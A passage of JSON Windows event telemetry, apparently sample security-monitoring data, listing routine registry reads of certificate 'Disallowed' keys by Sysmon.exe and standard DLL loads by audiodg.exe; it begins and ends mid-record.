"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883573976210000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883573976210000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "AudioSes.dll", - "image_path": "C:\\Windows\\System32\\AudioSes.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "avrt.dll", - "image_path": "C:\\Windows\\System32\\avrt.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976360000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976520000, - "unique_pid": 